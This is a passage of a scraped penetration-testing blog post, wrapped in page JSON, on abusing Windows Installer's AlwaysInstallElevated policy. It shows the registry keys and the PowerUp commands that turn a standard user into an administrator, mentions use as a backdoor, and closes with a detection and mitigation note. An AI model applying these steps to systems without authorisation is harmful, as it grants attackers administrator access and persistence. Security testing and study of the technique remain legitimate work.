up\u003C\u002Fp>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770015159744_12_23b8d4ff27-1.png\">\u003C\u002Fp>\u003Ch2>0x04 Privilege Escalation\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Privilege escalation can be achieved using Group Policy\u003C\u002Fp>\u003Cp>Enable the AlwaysInstallElevated privileged installation feature:\u003C\u002Fp>\u003Cul>\u003Cli>Open Group Policy Editor\u003C\u002Fli>\u003Cli>User Configuration - Administrative Templates - Windows Components - Windows Installer - Always install with elevated privileges:\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Select Enable\u003C\u002Fp>\u003Cul>\u003Cli>Computer Configuration - Administrative Templates - Windows Components - Windows Installer - Always install with elevated privileges:\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Select Enable\u003C\u002Fp>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770015160214_13_2f381018b6-1.png\">\u003C\u002Fp>\u003Cp>At this point, registry key values will be automatically created at the following locations:\u003C\u002Fp>\u003Cp>`[HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Installer]\u003C\u002Fp>\u003Cp>\"AlwaysInstallElevated\"=dword:00000001`\u003C\u002Fp>\u003Cp>`[HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer]\u003C\u002Fp>\u003Cp>\"AlwaysInstallElevated\"=dword:00000001`\u003C\u002Fp>\u003Cp>Next, use PowerUp to complete the privilege escalation and add user operation\u003C\u002Fp>\u003Cp>PowerUp address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fmaster\u002FPrivesc\u002FPowerUp.ps1\u003C\u002Fp>\u003Cp>Check if AlwaysInstallElevated is enabled:\u003C\u002Fp>\u003Cp>Get-RegistryAlwaysInstallElevated\u003C\u002Fp>\u003Cp>Returns true if the system has AlwaysInstallElevated enabled\u003C\u002Fp>\u003Cp>Exploiting AlwaysInstallElevated to add a user:\u003C\u002Fp>\u003Cp>Write-UserAddMSI\u003C\u002Fp>\u003Cp>After execution, generates the file UserAdd.msi\u003C\u002Fp>\u003Cp>Then run this UserAdd.msi with standard user privileges to successfully add an account\u003C\u002Fp>\u003Cp>Complete test as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770015161212_14_6f860d0752-1.jpeg\">\u003C\u002Fp>\u003Cp>Successfully adds an administrator account under a standard-privilege cmd\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If registry access is obtained, AlwaysInstallElevated can be enabled by modifying the registry (both registry key values must be changed), thereby escalating privileges, or even used as a post-exploitation backdoor\u003C\u002Fp>\u003Cp>Check if AlwaysInstallElevated is enabled:\u003C\u002Fp>\u003Cp>Just check the registry, the cmd commands are as follows:\u003C\u002Fp>\u003Cp>reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer \u002Fv AlwaysInstallElevated\u003C\u002Fp>\u003Cp>reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer \u002Fv AlwaysInstallElevated\u003C\u002Fp>\u003Cp>A value of 1 for all indicates AlwaysInstallElevated is enabled; otherwise, it is not enabled.\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Through msiexec, not only can remote code download and execution be achieved via the command line, but it can also be applied for privilege escalation. More exploitation methods are worth researching.\u003C\u002Fp>\u003Cp>Of course, for defense against these exploitation methods, simply disabling AlwaysInstallElevated can prevent privilege escalation via msi files.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",360,"Onedaysec",6,"published","2026-02-02T07:25:19.985Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"MSIexec Exploitation in Penetration Testing: Techniques & Tools","msiexec, penetration testing, msi exploitation, Metasploit, Advanced Installer, Windows Installer, command line attacks, payload delivery, security testing",null,false,[],{"docs":43,"hasNextPage":40},[44,45,4,46],1041,1040,1038,{"title":39,"description":39,"image":39},"2026-07-24T15:37:10.043Z","2026-07-23T16:02:28.253Z","draft","2026-07-23T16:16:16.572Z"]